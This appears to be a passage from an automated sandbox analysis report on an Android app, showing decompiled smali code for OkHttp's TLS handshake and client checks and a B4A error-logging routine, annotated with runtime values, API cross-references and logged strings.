                        156invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        158const-string v0, "\n | subjectAltNames: "
                        160invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        162sget-object v0, Lokhttp3/internal/tls/OkHostnameVerifier;->INSTANCE:Lokhttp3/internal/tls/OkHostnameVerifier;
                        164invoke-virtual {v0, p1}, Lokhttp3/internal/tls/OkHostnameVerifier;->allSubjectAltNames(Ljava/security/cert/X509Certificate;)Ljava/util/List;
                        165move-result-object p1
                        167invoke-virtual {v4, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        169const-string p1, "\n "
                        171invoke-virtual {v4, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        173invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        174move-result-object p1
                        176invoke-static {p1, v2, v7, v2}, Lkotlin/text/StringsKt;->trimMargin$default(Ljava/lang/String;Ljava/lang/String;ILjava/lang/Object;)Ljava/lang/String;
                        177move-result-object p1
                        179invoke-direct {v3, p1}, Ljavax/net/ssl/SSLPeerUnverifiedException;-><init>(Ljava/lang/String;)V
                        180check-cast v3, Ljava/lang/Throwable;
                        181throw v3
                        182cond_ef: new-instance p1, Ljavax/net/ssl/SSLPeerUnverifiedException;
                        183new-instance v2, Ljava/lang/StringBuilder;
                        185invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        187const-string v3, "Hostname "
                        189invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        191invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        192move-result-object v0
                        194invoke-virtual {v0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        195move-result-object v0
                        197invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        199const-string v0, " not verified (no certificates)"
                        201invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        203invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        204move-result-object v0
                        206invoke-direct {p1, v0}, Ljavax/net/ssl/SSLPeerUnverifiedException;-><init>(Ljava/lang/String;)V
                        207check-cast p1, Ljava/lang/Throwable;
                        208throw p1
                        209cond_115:
                        210invoke-virtual {v0}, Lokhttp3/Address;->certificatePinner()Lokhttp3/CertificatePinner;
                        211move-result-object v3
                        213invoke-static {v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        214new-instance v5, Lokhttp3/Handshake;
                        216invoke-virtual {v4}, Lokhttp3/Handshake;->tlsVersion()Lokhttp3/TlsVersion;
                        217move-result-object v6
                        219invoke-virtual {v4}, Lokhttp3/Handshake;->cipherSuite()Lokhttp3/CipherSuite;
                        220move-result-object v7
                        222invoke-virtual {v4}, Lokhttp3/Handshake;->localCertificates()Ljava/util/List;
                        223move-result-object v8
                        224new-instance v9, Lokhttp3/internal/connection/RealConnection$connectTls$1;
                        226invoke-direct {v9, v3, v4, v0}, Lokhttp3/internal/connection/RealConnection$connectTls$1;-><init>(Lokhttp3/CertificatePinner;Lokhttp3/Handshake;Lokhttp3/Address;)V
                        227check-cast v9, Lkotlin/jvm/functions/Function0;
                        229invoke-direct {v5, v6, v7, v8, v9}, Lokhttp3/Handshake;-><init>(Lokhttp3/TlsVersion;Lokhttp3/CipherSuite;Ljava/util/List;Lkotlin/jvm/functions/Function0;)V
                        230iput-object v5, p0, Lokhttp3/internal/connection/RealConnection;->handshake:Lokhttp3/Handshake;
                        232invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        233move-result-object v0
                        235invoke-virtual {v0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        236move-result-object v0
                        237new-instance v4, Lokhttp3/internal/connection/RealConnection$connectTls$2;
                        239invoke-direct {v4, p0}, Lokhttp3/internal/connection/RealConnection$connectTls$2;-><init>(Lokhttp3/internal/connection/RealConnection;)V
                        240check-cast v4, Lkotlin/jvm/functions/Function0;
                        242invoke-virtual {v3, v0, v4}, Lokhttp3/CertificatePinner;->check$okhttp(Ljava/lang/String;Lkotlin/jvm/functions/Function0;)V
                        244invoke-virtual {p1}, Lokhttp3/ConnectionSpec;->supportsTlsExtensions()Z
                        • Time: 699260
                          • This:
                            • ConnectionSpec(cipherSuites=[TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, TLS_RSA_WITH_AES_128_GCM_SHA256, TLS_RSA_WITH_AES_256_GCM_SHA384, TLS_RSA_WITH_AES_128_CBC_SHA, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA], tlsVersions=[TLS_1_3, TLS_1_2], supportsTlsExtensions=true)
                          • Return:
                            • true
                        245move-result p1
                        246if-eqz p1, :cond_158
                        248sget-object p1, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        250invoke-virtual {p1}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        251move-result-object p1
                        253invoke-virtual {p1, v1}, Lokhttp3/internal/platform/Platform;->getSelectedProtocol(Ljavax/net/ssl/SSLSocket;)Ljava/lang/String;
                        254move-result-object v2
                        255cond_158: move-object p1, v1
                        256check-cast p1, Ljava/net/Socket;
                        257iput-object p1, p0, Lokhttp3/internal/connection/RealConnection;->socket:Ljava/net/Socket;
                        258move-object p1, v1
                        259check-cast p1, Ljava/net/Socket;
                        261invoke-static {p1}, Lokio/Okio;->source(Ljava/net/Socket;)Lokio/Source;
                        262move-result-object p1
                        264invoke-static {p1}, Lokio/Okio;->buffer(Lokio/Source;)Lokio/BufferedSource;
                        265move-result-object p1
                        266iput-object p1, p0, Lokhttp3/internal/connection/RealConnection;->source:Lokio/BufferedSource;
                        267move-object p1, v1
                        268check-cast p1, Ljava/net/Socket;
                        270invoke-static {p1}, Lokio/Okio;->sink(Ljava/net/Socket;)Lokio/Sink;
                        271move-result-object p1
                        273invoke-static {p1}, Lokio/Okio;->buffer(Lokio/Sink;)Lokio/BufferedSink;
                        274move-result-object p1
                        275iput-object p1, p0, Lokhttp3/internal/connection/RealConnection;->sink:Lokio/BufferedSink;
                        276if-eqz v2, :cond_180
                        278sget-object p1, Lokhttp3/Protocol;->Companion:Lokhttp3/Protocol$Companion;
                        280invoke-virtual {p1, v2}, Lokhttp3/Protocol$Companion;->get(Ljava/lang/String;)Lokhttp3/Protocol;
                        281move-result-object p1
                        282goto/16 :goto_182
                        283cond_180:
                        284sget-object p1, Lokhttp3/Protocol;->HTTP_1_1:Lokhttp3/Protocol;
                        285goto_182: iput-object p1, p0, Lokhttp3/internal/connection/RealConnection;->protocol:Lokhttp3/Protocol;
                        286try_end_184: if-eqz v1, :cond_18f
                        288sget-object p1, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        290invoke-virtual {p1}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        291move-result-object p1
                        293invoke-virtual {p1, v1}, Lokhttp3/internal/platform/Platform;->afterHandshake(Ljavax/net/ssl/SSLSocket;)V
                        294cond_18f: return-void
                        295catchall_190: move-exception p1
                        296move-object v3, v1
                        297goto/16 :goto_19c
                        298try_start_193: new-instance p1, Ljava/lang/NullPointerException;
                        300const-string v0, "null cannot be cast to non-null type javax.net.ssl.SSLSocket"
                        302invoke-direct {p1, v0}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        303throw p1
                        304catchall_19b: move-exception p1
                        305goto_19c: if-eqz v3, :cond_1a7
                        307sget-object v0, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        309invoke-virtual {v0}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        310move-result-object v0
                        312invoke-virtual {v0, v3}, Lokhttp3/internal/platform/Platform;->afterHandshake(Ljavax/net/ssl/SSLSocket;)V
                        313cond_1a7: if-eqz v3, :cond_1ae
                        314check-cast v3, Ljava/net/Socket;
                        316invoke-static {v3}, Lokhttp3/internal/Util;->closeQuietly(Ljava/net/Socket;)V
                        317cond_1ae: throw p1
                        Cross References
                        APIs
                        • java.util.List.contains
                        • java.util.List.contains
                        • java.util.Collection.isEmpty
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.NullPointerException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        • java.lang.NullPointerException.<init>
                        Strings
                        • null cannot be cast to non-null type kotlin.collections.List<okhttp3.Interceptor?>
                        • Check failed.
                        • x509TrustManager == null
                        • certificateChainCleaner == null
                        • sslSocketFactory == null
                        • Null network interceptor:
                        • Null interceptor:
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lokhttp3/OkHttpClient;->interceptors:Ljava/util/List;
                        3const-string v1, "null cannot be cast to non-null type kotlin.collections.List<okhttp3.Interceptor?>"
                        4if-eqz v0, :cond_119
                        5const/4 v2, 0x0
                        7invoke-interface {v0, v2}, Ljava/util/List;->contains(Ljava/lang/Object;)Z
                        8move-result v0
                        9const/4 v3, 0x1
                        10xor-int/2addr v0, v3
                        11if-eqz v0, :cond_fa
                        13iget-object v0, p0, Lokhttp3/OkHttpClient;->networkInterceptors:Ljava/util/List;
                        14if-eqz v0, :cond_f4
                        16invoke-interface {v0, v2}, Ljava/util/List;->contains(Ljava/lang/Object;)Z
                        17move-result v0
                        18xor-int/2addr v0, v3
                        19if-eqz v0, :cond_d5
                        21iget-object v0, p0, Lokhttp3/OkHttpClient;->connectionSpecs:Ljava/util/List;
                        22check-cast v0, Ljava/lang/Iterable;
                        23instance-of v1, v0, Ljava/util/Collection;
                        24const/4 v2, 0x0
                        25if-eqz v1, :cond_2e
                        26move-object v1, v0
                        27check-cast v1, Ljava/util/Collection;
                        29invoke-interface {v1}, Ljava/util/Collection;->isEmpty()Z
                        30move-result v1
                        31if-eqz v1, :cond_2e
                        32cond_2c: const/4 v0, 0x1
                        33goto/16 :goto_45
                        34cond_2e:
                        35invoke-interface {v0}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        36move-result-object v0
                        37cond_32:
                        38invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        39move-result v1
                        40if-eqz v1, :cond_2c
                        42invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        43move-result-object v1
                        44check-cast v1, Lokhttp3/ConnectionSpec;
                        46invoke-virtual {v1}, Lokhttp3/ConnectionSpec;->isTls()Z
                        • Time: 697141
                          • This:
                            • ConnectionSpec(cipherSuites=[TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, TLS_RSA_WITH_AES_128_GCM_SHA256, TLS_RSA_WITH_AES_256_GCM_SHA384, TLS_RSA_WITH_AES_128_CBC_SHA, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA], tlsVersions=[TLS_1_3, TLS_1_2], supportsTlsExtensions=true)
                          • Return:
                            • true
                        47move-result v1
                        48if-eqz v1, :cond_32
                        49const/4 v0, 0x0
                        50goto_45: if-eqz v0, :cond_9e
                        52iget-object v0, p0, Lokhttp3/OkHttpClient;->sslSocketFactoryOrNull:Ljavax/net/ssl/SSLSocketFactory;
                        53if-nez v0, :cond_4d
                        54const/4 v0, 0x1
                        55goto/16 :goto_4e
                        56cond_4d: const/4 v0, 0x0
                        57goto_4e:
                        58const-string v1, "Check failed."
                        59if-eqz v0, :cond_92
                        61iget-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        62if-nez v0, :cond_58
                        63const/4 v0, 0x1
                        64goto/16 :goto_59
                        65cond_58: const/4 v0, 0x0
                        66goto_59: if-eqz v0, :cond_86
                        68iget-object v0, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        69if-nez v0, :cond_60
                        70goto/16 :goto_61
                        71cond_60: const/4 v3, 0x0
                        72goto_61: if-eqz v3, :cond_7a
                        74iget-object v0, p0, Lokhttp3/OkHttpClient;->certificatePinner:Lokhttp3/CertificatePinner;
                        76sget-object v2, Lokhttp3/CertificatePinner;->DEFAULT:Lokhttp3/CertificatePinner;
                        78invoke-static {v0, v2}, Lkotlin/jvm/internal/Intrinsics;->areEqual(Ljava/lang/Object;Ljava/lang/Object;)Z
                        79move-result v0
                        80if-eqz v0, :cond_6e
                        81goto/16 :goto_aa
                        82cond_6e: new-instance v0, Ljava/lang/IllegalStateException;
                        84invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        85move-result-object v1
                        87invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        88check-cast v0, Ljava/lang/Throwable;
                        89throw v0
                        90cond_7a: new-instance v0, Ljava/lang/IllegalStateException;
                        92invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        93move-result-object v1
                        95invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        96check-cast v0, Ljava/lang/Throwable;
                        97throw v0
                        98cond_86: new-instance v0, Ljava/lang/IllegalStateException;
                        100invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        101move-result-object v1
                        103invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        104check-cast v0, Ljava/lang/Throwable;
                        105throw v0
                        106cond_92: new-instance v0, Ljava/lang/IllegalStateException;
                        108invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        109move-result-object v1
                        111invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        112check-cast v0, Ljava/lang/Throwable;
                        113throw v0
                        114cond_9e:
                        115iget-object v0, p0, Lokhttp3/OkHttpClient;->sslSocketFactoryOrNull:Ljavax/net/ssl/SSLSocketFactory;
                        116if-eqz v0, :cond_c7
                        118iget-object v0, p0, Lokhttp3/OkHttpClient;->certificateChainCleaner:Lokhttp3/internal/tls/CertificateChainCleaner;
                        119if-eqz v0, :cond_b9
                        121iget-object v0, p0, Lokhttp3/OkHttpClient;->x509TrustManager:Ljavax/net/ssl/X509TrustManager;
                        122if-eqz v0, :cond_ab
                        123goto_aa: return-void
                        124cond_ab: new-instance v0, Ljava/lang/IllegalStateException;
                        126const-string v1, "x509TrustManager == null"
                        128invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        129move-result-object v1
                        131invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        132check-cast v0, Ljava/lang/Throwable;
                        133throw v0
                        134cond_b9: new-instance v0, Ljava/lang/IllegalStateException;
                        136const-string v1, "certificateChainCleaner == null"
                        138invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        139move-result-object v1
                        141invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        142check-cast v0, Ljava/lang/Throwable;
                        143throw v0
                        144cond_c7: new-instance v0, Ljava/lang/IllegalStateException;
                        146const-string v1, "sslSocketFactory == null"
                        148invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        149move-result-object v1
                        151invoke-direct {v0, v1}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        152check-cast v0, Ljava/lang/Throwable;
                        153throw v0
                        154cond_d5: new-instance v0, Ljava/lang/StringBuilder;
                        156invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        158const-string v1, "Null network interceptor: "
                        160invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        162iget-object v1, p0, Lokhttp3/OkHttpClient;->networkInterceptors:Ljava/util/List;
                        164invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        166invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        167move-result-object v0
                        168new-instance v1, Ljava/lang/IllegalStateException;
                        170invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        171move-result-object v0
                        173invoke-direct {v1, v0}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        174check-cast v1, Ljava/lang/Throwable;
                        175throw v1
                        176cond_f4: new-instance v0, Ljava/lang/NullPointerException;
                        178invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        179throw v0
                        180cond_fa: new-instance v0, Ljava/lang/StringBuilder;
                        182invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        184const-string v1, "Null interceptor: "
                        186invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        188iget-object v1, p0, Lokhttp3/OkHttpClient;->interceptors:Ljava/util/List;
                        190invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        192invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        193move-result-object v0
                        194new-instance v1, Ljava/lang/IllegalStateException;
                        196invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        197move-result-object v0
                        199invoke-direct {v1, v0}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        200check-cast v1, Ljava/lang/Throwable;
                        201throw v1
                        202cond_119: new-instance v0, Ljava/lang/NullPointerException;
                        204invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        205goto/16 :goto_120
                        206goto_11f: throw v0
                        207goto_120: goto/16 :goto_11f
                        Cross References
                        APIs
                        • java.lang.Throwable.getStackTrace
                        • java.lang.StackTraceElement.getClassName
                        • java.lang.String.startsWith
                        • java.lang.StackTraceElement.getClassName
                        • java.lang.String.length
                        • java.lang.String.substring
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StackTraceElement.getMethodName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StackTraceElement.getLineNumber
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.length
                        • java.io.ByteArrayOutputStream.<init>
                        • java.io.PrintWriter.<init>
                        • java.lang.Throwable.printStackTrace
                        • java.io.PrintWriter.close
                        • java.io.ByteArrayOutputStream.toByteArray
                        • java.lang.String.<init>
                        • java.io.UnsupportedEncodingException.printStackTrace
                        Strings
                        • (B4A line:
                        • )\n
                        • (java line:
                        • )
                        • newmessage1_service_start (java line: 28)
                        • UTF8
                        Position Instruction Meta Information
                        0sget-boolean v0, Lanywheresoftware/b4a/BA;->shellMode:Z
                        1if-nez v0, :cond_88
                        3invoke-virtual {p0}, Ljava/lang/Throwable;->getStackTrace()[Ljava/lang/StackTraceElement;
                        4move-result-object v0
                        5array-length v1, v0
                        6const/4 v2, 0x0
                        7goto_a: if-lt v2, v1, :cond_e
                        8goto/16 :goto_88
                        9cond_e: aget-object v3, v0, v2
                        11invoke-virtual {v3}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
                        12move-result-object v4
                        14sget-object v5, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        16invoke-virtual {v4, v5}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
                        17move-result v4
                        18if-eqz v4, :cond_85
                        19new-instance v0, Ljava/lang/StringBuilder;
                        21invoke-virtual {v3}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
                        22move-result-object v1
                        24sget-object v2, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        26invoke-virtual {v2}, Ljava/lang/String;->length()I
                        27move-result v2
                        28add-int/lit8 v2, v2, 0x1
                        30invoke-virtual {v1, v2}, Ljava/lang/String;->substring(I)Ljava/lang/String;
                        31move-result-object v1
                        33invoke-static {v1}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        34move-result-object v1
                        36invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        38invoke-virtual {v3}, Ljava/lang/StackTraceElement;->getMethodName()Ljava/lang/String;
                        39move-result-object v1
                        41invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        43invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        44move-result-object v0
                        46sget-object v1, Lanywheresoftware/b4a/BA;->debugLine:Ljava/lang/String;
                        47if-eqz v1, :cond_66
                        48new-instance v1, Ljava/lang/StringBuilder;
                        50invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        51move-result-object v0
                        53invoke-direct {v1, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        55const-string v0, " (B4A line: "
                        57invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        58sget v0, Lanywheresoftware/b4a/BA;->debugLineNum:I
                        60invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        62const-string v0, ")\n"
                        64invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        66sget-object v0, Lanywheresoftware/b4a/BA;->debugLine:Ljava/lang/String;
                        68invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        70invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        71move-result-object v0
                        72goto/16 :goto_8a
                        73cond_66: new-instance v1, Ljava/lang/StringBuilder;
                        75invoke-static {v0}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        76move-result-object v0
                        78invoke-direct {v1, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        80const-string v0, " (java line: "
                        82invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        84invoke-virtual {v3}, Ljava/lang/StackTraceElement;->getLineNumber()I
                        85move-result v0
                        87invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        89const-string v0, ")"
                        91invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        93invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        94move-result-object v0
                        95goto/16 :goto_8a
                        96cond_85: add-int/lit8 v2, v2, 0x1
                        97goto/16 :goto_a
                        98goto_88:
                        99const-string v0, ""
                        100goto_8a: if-eqz p1, :cond_b8
                        102invoke-virtual {v0}, Ljava/lang/String;->length()I
                        103move-result p1
                        104if-lez p1, :cond_95
                        106invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        • Time: 824956
                          • p0: newmessage1_service_start (java line: 28)
                        107cond_95: new-instance p1, Ljava/io/ByteArrayOutputStream;
                        109invoke-direct {p1}, Ljava/io/ByteArrayOutputStream;-><init>()V
                        110new-instance v1, Ljava/io/PrintWriter;
                        112invoke-direct {v1, p1}, Ljava/io/PrintWriter;-><init>(Ljava/io/OutputStream;)V
                        114invoke-virtual {p0, v1}, Ljava/lang/Throwable;->printStackTrace(Ljava/io/PrintWriter;)V
                        116invoke-virtual {v1}, Ljava/io/PrintWriter;->close()V
                        118invoke-virtual {p1}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
                        119move-result-object p0
                        120try_start_a9: new-instance p1, Ljava/lang/String;
                        122const-string v1, "UTF8"
                        124invoke-direct {p1, p0, v1}, Ljava/lang/String;-><init>([BLjava/lang/String;)V
                        • Time: 824957
                          • This:
                            • ?
                          • p0: [B@716dc63
                          • p0: ?
                          • p0: 6A6176612E6C616E672E52756E74696D65457863657074696F6E3A204F626A6563742073686F756C6420666972737420626520696E697469616C697A65642028496E74656E74292E0A09617420616E797768657265736F6674776172652E6234612E4162734F626A656374577261707065722E6765744F626A656374284162734F626A656374577261707065722E6A6176613A3635290A09617420616E797768657265736F6674776172652E6234612E6F626A656374732E496E74656E74577261707065722E676574416374696F6E28496E74656E74577261707065722E6A6176613A3338290A096174206A6176612E6C616E672E7265666C6563742E4D6574686F642E696E766F6B65284E6174697665204D6574686F64290A096174206A6F65626F7864726F69642E696E737472756D656E746174696F6E2E4A627844726F6964496E74657263657074696F6E2E67656E65726963496E746572636570746F72284A627844726F6964496E74657263657074696F6E2E6A6176613A333530290A096174206A6F65626F7864726F69642E696E737472756D656E746174696F6E2E4A627844726F6964496E74657263657074696F6E2E67656E65726963496E746572636570746F72284A627844726F6964496E74657263657074696F6E2E6A6176613A343134290A09617420636F6D2E4D72586E785669702E676C6F62616C2E
                          • p1: UTF8
                          • Return:
                            • ?
                        126invoke-static {p1}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        • Time: 824963
                          • p0: ?
                        127try_end_b3: goto/16 :goto_b8
                        128catch_b4: move-exception p0
                        130invoke-virtual {p0}, Ljava/io/UnsupportedEncodingException;->printStackTrace()V
                        131cond_b8: return-object v0
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.length
                        • java.lang.StringBuilder.<init>
                        • java.lang.String.split
                        • java.lang.StringBuilder.toString
                        • java.lang.String.length
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        Strings
                        • ~
                        • :
                        • (null string)
                        • \\n
                        • \n
                        • ~e:The Starter service should never be started from a receiver.
                        • ~e:newmessage1_service_start (java line: 28)
                        • ~i:** Activity (main) Create (first time) **
                        • ~i:** Activity (main) Pause, UserClosed = false **
                        • ~i:** Activity (main) Resume **
                        • ~i:** Receiver (firebasemessaging) OnReceive **
                        • ~i:** Receiver (newmessage1) OnReceive **
                        • ~i:** Receiver (pnservices) OnReceive **
                        • ~i:** Receiver (starter) OnReceive **
                        • ~i:** Service (firebasemessaging) Start **
                        • ~i:** Service (newmessage1) Create **
                        • ~i:** Service (newmessage1) Start **
                        • ~i:** Service (pnservices) Start **
                        • ~i:** Service (starter) Start **
                        • ~i:*** Receiver (httputils2service) Receive ***
                        • ~i:*** Receiver (httputils2service) Receive (first time) ***
                        • ~i:*** Service (firebasemessaging) Create ***
                        • ~i:*** Service (newmessage1) Create ***
                        • ~i:*** Service (pnservices) Create ***
                        • ~i:*** Service (starter) Create ***
                        • ~i:Service started in foreground mode.
                        • ~l161245210:NoToken
                        • ~l16196611:create
